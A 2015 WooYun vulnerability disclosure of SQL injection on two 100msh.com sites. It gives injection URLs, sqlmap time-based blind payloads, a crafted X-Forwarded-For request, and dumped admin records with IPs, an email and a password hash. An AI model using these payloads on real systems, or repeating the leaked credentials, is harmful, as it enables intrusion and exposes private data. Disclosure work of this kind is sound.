当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0104645

漏洞标题:百米生活多站点SQL注射漏洞

相关厂商:百米生活

漏洞作者: crypt

提交时间:2015-03-31 15:19

修复时间:2015-05-15 15:20

公开时间:2015-05-15 15:20

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:12

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-03-31: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-05-15: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

详细说明:

百米生活,通过免费商业Wi-Fi的铺设,在全国各城市打造一个基于本地化社区的电子商务服务平台,为商家提供产品推广、品牌宣传、商家管理及成本控制等服务;为消费者带来社区附近衣食住行、吃喝玩乐的信息服务,同时借助免费Wi-Fi技术支持,开启移动互联网的全新生活方式。
shop.100msh.com和m.100msh.com站点存在SQL注射漏洞,可拖库。shop.100msh.com
注入点:http://shop.100msh.com/index/set_area?area_id=57
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: area_id (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: area_id=57' AND (SELECT * FROM (SELECT(SLEEP(5)))MUWQ) AND 'rStO'='rStO
---
back-end DBMS: MySQL >= 5.0.0
Database: 100msh_admin
Table: anl_admin_users
[5 entries]
+---------+----------+----------+----------+-----------+-----------+------------+-----------------------------------------+------------------+-------------+-------------+-------------+-------------+----------------------------------------------------------------+--------------+--------------+--------------+--------------+---------------+-----------------+------------------+---------------+----------------------------------+-----------------+------------------+
| user_id | group_id | user_img | is_email | is_mobile | user_name | user_phone | user_chats | user_email | user_fax_no | user_gender | user_status | user_mobile | user_address | user_zipcode | user_regdate | user_cert_no | cash_account | user_birthday | last_login_ip | user_realname | point_account | user_password | last_login_time | second_level_pwd |
+---------+----------+----------+----------+-----------+-----------+------------+-----------------------------------------+------------------+-------------+-------------+-------------+-------------+----------------------------------------------------------------+--------------+--------------+--------------+--------------+---------------+-----------------+------------------+---------------+----------------------------------+-----------------+------------------+
| 1 | 3 | 0 | 0 | 0 | wzw | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 113.88.238.245 | SupserRoot | 0 | a87a7a8701db961210ab6ef55ad9ac3c | 1396010502 | |
| 2 | 3 | 0 | 0 | 0 | admin | | a:2:{s:3:"MSN";s:0:"";s:2:AQQ";s:0:"";} | tiqer@100mshAcom | 0 | 1 | 1 |

mask 区域
*****| 0            | 0            | 0             | 202.105.127.122 | Adminisu*****
*****9 | | \x02 | 0 | | 0 *****
*****9 | | | 0 | | 0 *****
***** | 15919832695 | | | 0 *****

0 | |
+---------+----------+----------+----------+-----------+-----------+------------+-----------------------------------------+------------------+-------------+-------------+-------------+-------------+----------------------------------------------------------------+--------------+--------------+--------------+--------------+---------------+-----------------+------------------+---------------+----------------------------------+-----------------+------------------+
m.100msh.com
X-Forwarded-For头注入

GET /ajax/store.php?id=7306 HTTP/1.1
Host: m.100msh.com
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Accept: application/json
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Referer: http://m.100msh.com/
Cookie: PHPSESSID=f8usqpc5bnae0763u5svm6cj47; cityName=%E6%B7%B1%E5%9C%B3%E5%B8%82; is_navigator=0; Hm_lvt_217ce928b5e91bb9e52243ad0d2b8d47=1427332396; Hm_lpvt_217ce928b5e91bb9e52243ad0d2b8d47=1427334722; _ga=GA1.2.137151480.1427332397; _gat=1
X-Forwarded-For: 8.8.8.8*
Connection: keep-alive


sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: X-Forwarded-For #1* ((custom) HEADER)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: 8.8.8.8' AND (SELECT * FROM (SELECT(SLEEP(5)))wsmC) AND 'iDga'='iDga
---
back-end DBMS: MySQL >= 5.0.0
Database: 100msh_partner
[41 tables]
+----------------------------------+
| anl_accessrights |
| anl_admin_access_token |
| anl_admin_minUsers_tmp |
| anl_admin_pos |
| anl_admin_users |
| anl_admin_users_bak |
| anl_login_log |
| anl_partner |
| anl_partner_addition |
| anl_partner_cateqory |
| anl_partner_credit_operation_log |
| anl_partner_credit_points |
| anl_partner_ctag |
| anl_partner_ctag_rel |
| anl_partner_gallery |
| anl_partner_info_aueit |
| anl_partner_level |
| anl_partner_level_rule |
| anl_partner_linyi_osg |
| anl_partner_log |
| anl_partner_peportqd |
| anl_partner_policy |
| anl_partner_policy_domp |
| anl_partner_policy_level |
| anl_partner_prefereqtial |
| anl_partner_prefereqtial_count |
| anl_partner_search_config |
| anl_partner_search_keyword |
| anl_partner_tag_rem |
| anl_partner_tpl_cfg |
| anl_partner_user_search_keyword |
| anl_partner_views |
| anl_partner_views_num_info_all |
| anl_partner_views_nuo_info |
| anl_posadcess |
| anl_positions |
| anl_statecity |
| anl_tag |
| anl_tmp_cmp_msg_rel |
| anl_tmp_wx_partner_msg |
| anl_watermark |
+----------------------------------+

漏洞证明:

back-end DBMS: MySQL >= 5.0.0
Database: 100msh_admin
Table: anl_admin_users
[5 entries]
+---------+----------+----------+----------+-----------+-----------+------------+-----------------------------------------+------------------+-------------+-------------+-------------+-------------+----------------------------------------------------------------+--------------+--------------+--------------+--------------+---------------+-----------------+------------------+---------------+----------------------------------+-----------------+------------------+
| user_id | group_id | user_img | is_email | is_mobile | user_name | user_phone | user_chats | user_email | user_fax_no | user_gender | user_status | user_mobile | user_address | user_zipcode | user_regdate | user_cert_no | cash_account | user_birthday | last_login_ip | user_realname | point_account | user_password | last_login_time | second_level_pwd |
+---------+----------+----------+----------+-----------+-----------+------------+-----------------------------------------+------------------+-------------+-------------+-------------+-------------+----------------------------------------------------------------+--------------+--------------+--------------+--------------+---------------+-----------------+------------------+---------------+----------------------------------+-----------------+------------------+
| 1 | 3 | 0 | 0 | 0 | wzw | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 |

mask 区域
*****7a8701db961210ab6ef55ad9ac3c *****
*****\?e0\x01圳市福田区莲花\\?ee\x00\x01道北环大道南青\\?e6\\?c8\x01大厦9楼 | 0 | 0 | 0 *****
*****9 | | \x02 | 0 | | 0 *****
*****9 | | | 0 | | 0 *****
*****695 | | | 0 | | 0*****


+---------+----------+----------+----------+-----------+-----------+------------+-----------------------------------------+------------------+-------------+-------------+-------------+-------------+----------------------------------------------------------------+--------------+--------------+--------------+--------------+---------------+-----------------+------------------+---------------+----------------------------------+-----------------+------------------+
back-end DBMS: MySQL >= 5.0.0
Database: 100msh_partner
[41 tables]
+----------------------------------+
| anl_accessrights |
| anl_admin_access_token |
| anl_admin_minUsers_tmp |
| anl_admin_pos |
| anl_admin_users |
| anl_admin_users_bak |
| anl_login_log |
| anl_partner |
| anl_partner_addition |
| anl_partner_cateqory |
| anl_partner_credit_operation_log |
| anl_partner_credit_points |
| anl_partner_ctag |
| anl_partner_ctag_rel |
| anl_partner_gallery |
| anl_partner_info_aueit |
| anl_partner_level |
| anl_partner_level_rule |
| anl_partner_linyi_osg |
| anl_partner_log |
| anl_partner_peportqd |
| anl_partner_policy |
| anl_partner_policy_domp |
| anl_partner_policy_level |
| anl_partner_prefereqtial |
| anl_partner_prefereqtial_count |
| anl_partner_search_config |
| anl_partner_search_keyword |
| anl_partner_tag_rem |
| anl_partner_tpl_cfg |
| anl_partner_user_search_keyword |
| anl_partner_views |
| anl_partner_views_num_info_all |
| anl_partner_views_nuo_info |
| anl_posadcess |
| anl_positions |
| anl_statecity |
| anl_tag |
| anl_tmp_cmp_msg_rel |
| anl_tmp_wx_partner_msg |
| anl_watermark |
+----------------------------------+

修复方案:

转义,过滤

版权声明:转载请注明来源 crypt@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝